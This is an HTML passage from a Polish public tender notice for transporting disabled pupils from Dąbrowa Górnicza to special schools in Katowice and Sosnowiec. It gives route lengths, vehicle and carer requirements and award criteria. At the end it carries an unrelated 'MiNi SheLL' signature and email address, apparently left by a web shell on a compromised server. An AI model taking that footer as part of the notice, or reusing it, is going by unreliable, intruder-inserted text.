<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przewóz 10 uczniów niepełnosprawnych z Dąbrowy Górniczej do Zespołu Szkolno-Przedszkolnego dla Niesłyszących i Słabo Słyszących  w Katowicach, ul. Grażyńskiego nr 17 i z powrotem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1
Przedmiotem zamówienia jest przewóz 10 uczniów niepełnosprawnych z Dąbrowy Górniczej do Zespołu Szkolno - Przedszkolnego dla Dzieci Niesłyszących i Słabo Słyszących w Katowicach, ul. Grażyńskiego 17 i z powrotem w okresie od 3.09.2012 r. do 28.06.2013 r. z wyłączeniem dni wolnych od zajęć. 
Wykonawca zobowiązany będzie do odbioru uczniów niepełnosprawnych z wyznaczonych przez Zamawiającego przystanków (określonych w załączniku nr 1 do umowy nr 7/1), dowozu do szkoły w Katowicach przy ul. Grażyńskiego 17  oraz ich odwozu bezpośrednio po zakończonych zajęciach do wyznaczonych miejsc (zał. nr 1 do umowy nr 7/1). Wstępne oszacowanie trasy wynosi 50 km. Opis tras zawiera załącznik nr 1 do umowy nr 7/1 . 
Warunki realizacji umowy:
1.	Przed podpisaniem umowy każda trasa zostanie ponownie zmierzona komisyjnie, jej długość i przystanki zostaną zweryfikowane oraz będą stanowić załącznik do umowy.
2.	Zamawiający dopuszcza zmianę trasy i jej długości w sytuacji niezależnej od Zamawiającego i Wykonawcy, spowodowanej np. objazdami, większą liczbą przystanków, zmianą  miejsc zamieszkania uczniów, zmianą ilości uczniów, zgodnie z zapisami pkt. 25.4 a) i b) SIWZ.
3.	Harmonogram przewozu (tj. czas przywozu i odwozu uczniów niepełnosprawnych) uzależniony będzie od rozkładu zajęć, uzgodnionego z dyrektorem placówki.  
4.	Wykonawca zapewnia opiekuna przewozu na własny koszt. Opiekun zobowiązany jest do opieki nad uczniami od momentu odbioru uczniów z danego przystanku do wprowadzenia ich do budynku danej szkoły i tak samo w drodze powrotnej, zapewniając w ten sposób warunki bezpieczeństwa każdemu przewożonemu uczniowi podczas wsiadania, wysiadania i przejazdu, aż do momentu odebrania ucznia przez pracowników szkoły lub rodzica/opiekuna prawnego ucznia. 
5.	Usługa objęta niniejszym zamówieniem ma być świadczona środkami transportu przystosowanymi do przewozu osób niepełnosprawnych, spełniającymi wymogi bezpieczeństwa i kodeksu drogowego, w szczególności pojazdem wyposażonym w:
- pasy bezpieczeństwa
- ogrzewanie
- minimum 10 miejsc dla pasażerów (uczniów niepełnosprawnych) oraz miejsce dla opiekuna
6.	W przypadku awarii pojazdu Wykonawca zobowiązany będzie do niezwłocznego podstawienia pojazdu zastępczego o równorzędnym standardzie, nie później niż w ciągu jednej godziny od zaistnienia zdarzenia. 
7.	Stan techniczny pojazdów musi spełniać warunki dopuszczenia do ruchu drogowego. 
8.	Zadeklarowane środki transportu w ramach poszczególnych zadań mają posiadać aktualne badania techniczne i maja być sprawne do należytego wykonania zamówienia oraz posiadać aktualne ubezpieczenie OC i NW.
9.	Wykonawca zobowiązany jest wyposażyć kierowcę w telefon komórkowy i podać ten nr Zamawiającemu.
10.	Wykonawca zapewni ciągłość ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej działalności na kwotę minimum 50 000 zł w okresie obowiązywania umowy. 
11.	Rozliczenie za wykonany przedmiot zamówienia następować będzie miesięcznie zgodnie z ceną jednostkową podaną w ofercie z uwzględnieniem ilości kilometrów po przedstawieniu Karty potwierdzenia przewozu według wzoru  będącym załącznikiem nr 2 do umowy 7/1. Karta potwierdzenia musi być potwierdzona przez dyrektora szkoły, do której będą przewożeni uczniowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.17.20.00-4, 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przewóz 15 uczniów niepełnosprawnych, w tym dwóch na wózkach inwalidzkich 
z Dąbrowy Górniczej do Zespołu Szkół Specjalnych nr 4 w Sosnowcu, ul. Franciszkańska 5a i z powrotem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2
Przedmiotem zamówienia jest przewóz 15 uczniów niepełnosprawnych, w tym dwóch na wózkach inwalidzkich z Dąbrowy Górniczej do Zespołu Szkół Specjalnych nr 4 w Sosnowcu, ul. Franciszkańska 5a i z powrotem w okresie od 3.09.2012 r. do 28.06.2013 r. z wyłączeniem dni wolnych od zajęć. 
Wykonawca zobowiązany będzie do odbioru uczniów niepełnosprawnych z wyznaczonych przez Zamawiającego przystanków (określonych w załączniku nr 1 do umowy nr 7/2), dowozu do szkoły w Sosnowcu przy ul. Franciszkańskiej 5a oraz ich odwozu bezpośrednio po zakończonych zajęciach do wyznaczonych miejsc (zał. nr 1 do umowy nr 7/2). Wstępne oszacowanie trasy wynosi 82 km. Opis tras zawiera załącznik nr 1 do umowy nr 7/2 .
Warunki realizacji umowy:
1.	Przed podpisaniem umowy każda trasa zostanie ponownie zmierzona komisyjnie, jej długość i przystanki zostaną zweryfikowane oraz będą stanowić załącznik do umowy.
2.	Zamawiający dopuszcza zmianę trasy i jej długości w sytuacji niezależnej od Zamawiającego i Wykonawcy, spowodowanej np. objazdami, większą liczbą przystanków, zmianą  miejsc zamieszkania uczniów, zmianą ilości uczniów, zgodnie z zapisami pkt. 25.4 a) i b) SIWZ.
3.	Harmonogram przewozu (tj. czas przywozu i odwozu uczniów niepełnosprawnych) uzależniony będzie od rozkładu zajęć, uzgodnionego z dyrektorem placówki.  
4.	Wykonawca zapewnia opiekuna przewozu na własny koszt. Opiekun zobowiązany jest do opieki nad uczniami od momentu odbioru uczniów z danego przystanku do wprowadzenia ich do budynku danej szkoły i tak samo w drodze powrotnej, zapewniając w ten sposób warunki bezpieczeństwa każdemu przewożonemu uczniowi podczas wsiadania, wysiadania i przejazdu, aż do momentu odebrania ucznia przez pracowników szkoły lub rodzica/opiekuna prawnego ucznia. 
5.	Usługa objęta niniejszym zamówieniem ma być świadczona środkami transportu przystosowanymi do przewozu osób niepełnosprawnych, spełniającymi wymogi bezpieczeństwa i kodeksu drogowego, 
w szczególności pojazdem wyposażonym w:
- pasy bezpieczeństwa
- ogrzewanie
- minimum 15 miejsc dla pasażerów (uczniów niepełnosprawnych), w tym 2 miejsca na wózki inwalidzkie oraz miejsce dla opiekuna
- windę lub podjazd do podnoszenia wózków inwalidzkich oraz mocowania na dwa miejsca na wózki inwalidzkie.
6.	W przypadku awarii pojazdu Wykonawca zobowiązany będzie do niezwłocznego podstawienia pojazdu zastępczego o równorzędnym standardzie, nie później niż w ciągu jednej godziny od zaistnienia zdarzenia. 
7.	Stan techniczny pojazdów musi spełniać warunki dopuszczenia do ruchu drogowego. 
8.	Zadeklarowane środki transportu w ramach poszczególnych zadań mają posiadać aktualne badania techniczne i maja być sprawne do należytego wykonania zamówienia oraz posiadać aktualne ubezpieczenie OC i NW.
9.	Wykonawca zobowiązany jest wyposażyć kierowcę w telefon komórkowy i podać ten nr Zamawiającemu.
10.	Wykonawca zapewni ciągłość ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej działalności na kwotę minimum 50 000 zł w okresie obowiązywania umowy. 
11.	Rozliczenie za wykonany przedmiot zamówienia następować będzie miesięcznie zgodnie z ceną jednostkową podaną w ofercie z uwzględnieniem ilości kilometrów po przedstawieniu Karty potwierdzenia przewozu według wzoru  będącym załącznikiem nr 2 do umowy 7/2. Karta potwierdzenia musi być potwierdzona przez dyrektora szkoły, do której będą przewożeni uczniowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.17.20.00-4, 60.13.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com